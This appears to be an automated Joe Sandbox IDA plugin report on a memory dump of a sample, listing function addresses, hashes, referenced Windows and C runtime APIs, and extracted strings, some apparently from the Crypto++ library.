Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
Opcode ID: 0d85924f288291062541323b4d1064701258856ca9b9e6051d45eb023d24ad97
Instruction ID: b2703fe11f562a495f2c8a064cc27f691923a9766aba1738b776d5ae9aec6041
Opcode Fuzzy Hash: 0d85924f288291062541323b4d1064701258856ca9b9e6051d45eb023d24ad97
Instruction Fuzzy Hash: A3316D71A01744AFCB14CF69C580A9AFBF8FF19210F508A6EE95687B41D770F644CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C90DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6C90DCC5

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

__CxxThrowException@8.LIBCMT ref: 6C90DCDA

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C90DD09
__CxxThrowException@8.LIBCMT ref: 6C90DD1E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: fe1bc3da8219e30095f3e41e8d8f8baba9411915f4632e9b208410b62e0e11ef
Instruction ID: 8db10d63383e23a0d652ed019c999f47419f0c08ac91ca7c4decfb522dfe8c0d
Opcode Fuzzy Hash: fe1bc3da8219e30095f3e41e8d8f8baba9411915f4632e9b208410b62e0e11ef
Instruction Fuzzy Hash: 0F315CB6A003089FDB04CF99D841A9EBBF8BF69710F15856DE91997B50D770EA04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C952645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C952653

Part of subcall function 6C949D66: __FF_MSGBANNER.LIBCMT ref: 6C949D7F
Part of subcall function 6C949D66: __NMSG_WRITE.LIBCMT ref: 6C949D86
Part of subcall function 6C949D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C949DAB

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 2864ca7b3141c1f81874d96bce46ed14bb87e3a3b3439f4773a9b0e4437fc451
Instruction ID: 791e07e282398ac2d44766f2e2619a37ffed97da5dcc586f4f97d14488f85922
Opcode Fuzzy Hash: 2864ca7b3141c1f81874d96bce46ed14bb87e3a3b3439f4773a9b0e4437fc451
Instruction Fuzzy Hash: 51113A3750BA14ABCB119F75E80C69E37ACAF63765B64452BF8489BFC0DB34C8508B94

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F7240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6C914410: _malloc.LIBCMT ref: 6C91446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6C8F7287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6C8F729B
_memmove.LIBCMT ref: 6C8F72AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6C8F72B8

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: 11f20b2a6c0714a49c78811299a70e1fb4e2d3d78744bb723a8b930b7c0ed234
Instruction ID: 2c1837f4c234f31414fbc97b82ae246ddd538289b76ee763de297aca823655a7
Opcode Fuzzy Hash: 11f20b2a6c0714a49c78811299a70e1fb4e2d3d78744bb723a8b930b7c0ed234
Instruction Fuzzy Hash: 051193B2A04118BBDB10CF95D940DDFBB7CDFA9694B118269F90597640DA70DA058BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6C905A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C905AB9
VariantCopy.OLEAUT32(?,6C979C90), ref: 6C905AC1
VariantClear.OLEAUT32(?), ref: 6C905AE2
__CxxThrowException@8.LIBCMT ref: 6C905AEF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 625742018eaf73bb8e63f9b590510e92161f059a6ff72a43f44fed5d0f9c68b0
Instruction ID: 1038c0909b78525538d9c1f88cdc1c5c5ad1f5138f95781e684590458f580619
Opcode Fuzzy Hash: 625742018eaf73bb8e63f9b590510e92161f059a6ff72a43f44fed5d0f9c68b0
Instruction Fuzzy Hash: 5B11D672A05158ABDB00DF9988C49DFBB78EB56714F21412EE824A3B40C7749E048BE4

Uniqueness

Uniqueness Score: -1.00%

Function 6C950A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C950A86

Part of subcall function 6C9508B2: __fltout2.LIBCMT ref: 6C9508DD

__cftog_l.LIBCMT ref: 6C950AAC
__cftoe_l.LIBCMT ref: 6C950ADE

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: dba80e68922ff29ac831efd25c9d733078913e85441a415e37c1bad8fab5d9cc
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 5011923700018EBBCF128E84DC15CDE3F26BB29358F999515FE2859930C736C5B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C948970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C948A84
_memmove.LIBCMT ref: 6C948AA0

Strings

EncodingParameters, xrefs: 6C948A41

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: 040b6f2b1c262aec4db88338bf8a1789fd46b21ac720fa8e126020f44c55ac6e
Instruction ID: 708a47056be6e2b3dfe3eb68f2ca0885ff0ccf6f5daa84459f49ce88a58d84e1
Opcode Fuzzy Hash: 040b6f2b1c262aec4db88338bf8a1789fd46b21ac720fa8e126020f44c55ac6e
Instruction Fuzzy Hash: 4C6113B42083419FD304CF68C880A2AFBE9BFD9754F148A1EF59987391D770E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8EF190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4760: __CxxThrowException@8.LIBCMT ref: 6C8E47F9

Part of subcall function 6C918D80: _malloc.LIBCMT ref: 6C918D8A
Part of subcall function 6C918D80: _malloc.LIBCMT ref: 6C918DAF

_memcpy_s.LIBCMT ref: 6C8EF282
_memset.LIBCMT ref: 6C8EF293

Strings

@, xrefs: 6C8EF2DE

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: de6c87662ec03273cf04d3fa795756b51d36725ba6dcc41f2379b5e1cd6200f2
Instruction ID: 9b85356cf8efc7a59e1a14c24edc47651d9425fee61d840fb6254c47bfdfc9eb
Opcode Fuzzy Hash: de6c87662ec03273cf04d3fa795756b51d36725ba6dcc41f2379b5e1cd6200f2
Instruction Fuzzy Hash: 9D51C071900348DFDB20CFA4D941BDEBBB4BF66308F108598D84967781DB71AA09CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E4100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4175
_memmove.LIBCMT ref: 6C8E41C6

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

Strings

string too long, xrefs: 6C8E4170

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: ad61e20e36416f254f4b973c234b8bfac8cdd1dcbdea4b2c319f648111de4397
Instruction ID: bc1a048658684483c0dbf76b5261f396e5575a691955c1994764428ca9431797
Opcode Fuzzy Hash: ad61e20e36416f254f4b973c234b8bfac8cdd1dcbdea4b2c319f648111de4397
Instruction Fuzzy Hash: 0E31B6323116145BDB308EDCAD80A5AF7E9EBFB764B200D2BE599C7F40C761D8449791

Uniqueness

Uniqueness Score: -1.00%

Function 6C91C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C91C39B

Strings

gfff, xrefs: 6C91C3A3
gfff, xrefs: 6C91C3F7

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: 1504af6b1898469146b3493f9df9f6640a526c314cba8f49d75715c815af31af
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: F8317271A0420DAFD714CF98D981EFEB779EB94318F44812CE81597B84D730BA09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E18C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C8E194F

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

std::exception::exception.LIBCMT ref: 6C8E198E

Part of subcall function 6C9495C1: std::exception::operator=.LIBCMT ref: 6C9495DA

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067
Part of subcall function 6C8E4010: _memmove.LIBCMT ref: 6C8E40C8

Strings

Clone() is not implemented yet., xrefs: 6C8E18ED

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: 9bb186905194f562dbaf75d9e5a556b077f1c82fe7193a6f3c0cf2b8716d262b
Instruction ID: 42ffe1b7cb521805122164e2b3fca629590b32edbdcc90dce2b37c1817a240d4
Opcode Fuzzy Hash: 9bb186905194f562dbaf75d9e5a556b077f1c82fe7193a6f3c0cf2b8716d262b
Instruction Fuzzy Hash: 84316271805248AFDB14CFD9D840BEEFBB8FB5A714F204A2EE421A7B90D7749508CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C915560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C915657

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

InputBuffer, xrefs: 6C9155BF
StringStore: missing InputBuffer argument, xrefs: 6C9155E0

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: 2af52c93dbe9efede08db954047e43430881abdd46c3376b5d742c98e42bc88c
Instruction ID: 122ec4de895512fa2478751054c787e6895519fc00694a7f47564c8a54e6ba18
Opcode Fuzzy Hash: 2af52c93dbe9efede08db954047e43430881abdd46c3376b5d742c98e42bc88c
Instruction Fuzzy Hash: 994129B15083809FD310CF5AC590A5BBBE4BBD9714F544A2EF5A983B90D774D908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E1EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C8E1F36

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

std::exception::exception.LIBCMT ref: 6C8E1F6E

Part of subcall function 6C9495C1: std::exception::operator=.LIBCMT ref: 6C9495DA

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067
Part of subcall function 6C8E4010: _memmove.LIBCMT ref: 6C8E40C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6C8E1ED4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 170c9d041d35bfd2efcc607f931cafc1c598409db13003c1c883dc4edef5809b
Instruction ID: 82bf98e3894b9f8ee1e44b17f138c52a0c81f4cd23fdc94607051796638265e5
Opcode Fuzzy Hash: 170c9d041d35bfd2efcc607f931cafc1c598409db13003c1c883dc4edef5809b
Instruction Fuzzy Hash: DB317271804248EFDB14CFA9D840BDEFBB8FB5A714F204A6EE425A7B90D7749508CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F3317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C8F3327

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

std::_Xinvalid_argument.LIBCPMT ref: 6C8F336B

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

Strings

vector<T> too long, xrefs: 6C8F3366

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
